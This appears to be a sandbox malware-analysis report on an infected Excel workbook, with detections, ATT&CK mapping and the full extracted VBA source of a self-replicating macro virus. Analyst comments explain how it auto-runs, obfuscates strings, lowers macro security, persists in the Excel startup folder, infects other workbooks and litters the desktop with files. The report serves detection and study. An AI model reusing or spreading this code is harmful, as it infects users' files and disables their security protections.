MALICIOUS
140
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The VBA macro attempts to write to AUTOEXEC.BAT and C:\Windows\Nor.drv, indicating an attempt to modify system files. The macro also attempts to disable security settings and write its own code to a file, suggesting a persistence or execution mechanism. The ClamAV detections 'Win.Trojan.Psycho-3' and 'Xls.Trojan.Feeder-1' further support a malicious classification.
Heuristics 2
-
ClamAV: Win.Trojan.Psycho-3 — critical — CLAMAV_DETECTION: ClamAV detected this file as malware: Win.Trojan.Psycho-3
-
VBA macros detected — medium — OLE_VBA_MACROS: Document contains VBA macro code
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3828 bytes |

SHA-256: e6d9559ce6def18a68d9dc26eb24cf0a537926161ee59c63297da0e9a2caf07f

Detection — ClamAV: Xls.Trojan.Feeder-1. Obfuscation or payload: unlikely.
Preview script — first 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' MarshYello
' Auto-run entry point: Excel raises Workbook_Activate whenever this workbook
' becomes the active window, so everything below runs without user action.
' Analyst annotation of the carved sample; the code itself is left as extracted.
Private Sub Workbook_activate()
' Goof By Yello 25/10/00
' Swallow every runtime error so a failing step (missing path, locked VB
' project, unavailable object) does not stop the remaining steps.
On Error Resume Next
With Application
' (5 * 2 - 10) evaluates to 0, i.e. False: alerts, screen redraws and the
' status bar are switched off so the user sees no prompts while this runs.
.DisplayAlerts = (5 * 2 - 10)
.Application.ScreenUpdating = (5 * 2 - 10)
.Application.DisplayStatusBar = (5 * 2 - 10)
End With
' Appends one line to c:\AUTOEXEC.BAT. The Chr() chain decodes to
' "SET TEMP=C:\WINDOWS\DESKTOP"; assembling it from character codes keeps the
' string out of a plain-text view of the macro.
Open "c:\AUTOEXEC.BAT" For Append As #1
Print #1, Chr(83) & Chr(69) & Chr(84) & Chr(32) & Chr(84) & Chr(69) & Chr(77) & Chr(80) & Chr(61) & Chr(67) & Chr(58) & Chr(92) & Chr(87) & Chr(73) & Chr(78) & Chr(68) & Chr(79) & Chr(87) & Chr(83) & Chr(92) & Chr(68) & Chr(69) & Chr(83) & Chr(75) & Chr(84) & Chr(79) & Chr(80)
Close #1
' Second append; this chain decodes to "SET TMP=C:\WINDOWS\DESKTOP".
Open "c:\AUTOEXEC.BAT" For Append As #1
Print #1, Chr(83) & Chr(69) & Chr(84) & Chr(32) & Chr(84) & Chr(77) & Chr(80) & Chr(61) & Chr(67) & Chr(58) & Chr(92) & Chr(87) & Chr(73) & Chr(78) & Chr(68) & Chr(79) & Chr(87) & Chr(83) & Chr(92) & Chr(68) & Chr(69) & Chr(83) & Chr(75) & Chr(84) & Chr(79) & Chr(80)
Close #1
' Greys out the Tools > Macro > Security... menu item so the macro security
' level cannot be raised from the UI.
CommandBars("Macro").Controls("Security...").Enabled = False
' Writes Level=1 under the Office 9.0 (Office 2000) Word security key; 1 is the
' Low setting on that scale. System.PrivateProfileString is a Word object-model
' call and the key is Word's, although this runs inside Excel — presumably it
' fails silently here under On Error Resume Next; confirm in a sandbox.
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
' Dumps the first 65 lines of the first VB component's code module (this
' macro's own source) to C:\Windows\Nor.drv. That dump is the infection source
' used below, so the file is a useful on-disk indicator.
Open "C:\Windows\Nor.drv" For Output As #1
Print #1, VBProject.VBComponents(1).codemodule.Lines(1, 65)
Close #1
' Attribute 6 = vbHidden (2) + vbSystem (4): hides the dump from a default
' Explorer listing.
SetAttr ("C:\Windows\Nor.drv"), 6
' Handles on the ThisWorkbook code module of the active workbook (the
' infection target) and of this workbook (the carrier). ThisWB is assigned
' but not referenced again in this routine.
Set ActiveWB = ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").codemodule
Set ThisWB = ThisWorkbook.VBProject.VBComponents("ThisWorkbook").codemodule
' Persistence: if no "Book1." (no extension) exists in Excel's startup folder,
' save this workbook there so Excel opens it — and fires this handler — on
' every launch.
CheckExist = Dir(Application.StartupPath & "\Book1.")
If CheckExist = "" Then
VBAProject.ThisWorkbook.SaveAs Filename:=Application.StartupPath & "\Book1.", FileFormat:=xlNormal, AddToMru:=False
End If
' Infection: the "' MarshYello" comment serves as the already-infected marker.
' If line 3 of the active workbook's module is not that marker, the module is
' wiped, refilled from Nor.drv and the workbook saved.
If ActiveWB.Lines(3, 1) <> "' MarshYello" Then
ActiveWB.DeleteLines 1, ActiveWB.CountofLines
ActiveWB.AddFromFile ("C:\Windows\Nor.drv")
ActiveWorkbook.Save
End If
' Payload trigger: takes a two-digit field from the current time (minutes or
' seconds, depending on the locale's time-string format — confirm) and calls
' MY_Name when that value is 45 or more.
trouble1 = Right(Time, 5)
trouble = Left(trouble1, 2)
If trouble >= 45 Then Call MY_Name
End Sub
' Nuisance payload, called from Workbook_activate: drops 1000 empty files with
' random four-digit names onto the Windows desktop. These files (and the
' extension set below) are the visible artifact to look for on a host.
Private Sub MY_Name()
Count = 0
Do
' Re-seed, then draw a 1..9999 file name and a 1..5 extension selector.
Randomize
XXXX = Int((9999 * Rnd) + 1)
ZZZZ = Int((5 * Rnd) + 1)
' Extension assembled from character codes: 1 -> ".shs", 2 -> ".rat",
' 3 -> ".hlp", 4 -> ".js", 5 -> ".wav".
If ZZZZ = 1 Then ZZZZ = Chr(46) & Chr(115) & Chr(104) & Chr(115)
If ZZZZ = 2 Then ZZZZ = Chr(46) & Chr(114) & Chr(97) & Chr(116)
If ZZZZ = 3 Then ZZZZ = Chr(46) & Chr(104) & Chr(108) & Chr(112)
If ZZZZ = 4 Then ZZZZ = Chr(46) & Chr(106) & Chr(115)
If ZZZZ = 5 Then ZZZZ = Chr(46) & Chr(119) & Chr(97) & Chr(118)
' Open For Output followed immediately by Close creates (or truncates) an
' empty file at c:\windows\desktop\<NNNN><ext>; nothing is written to it.
Open "c:\windows\desktop\" & XXXX & ZZZZ For Output As #1
Close #1
Count = Count + 1
Loop Until Count = 1000
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||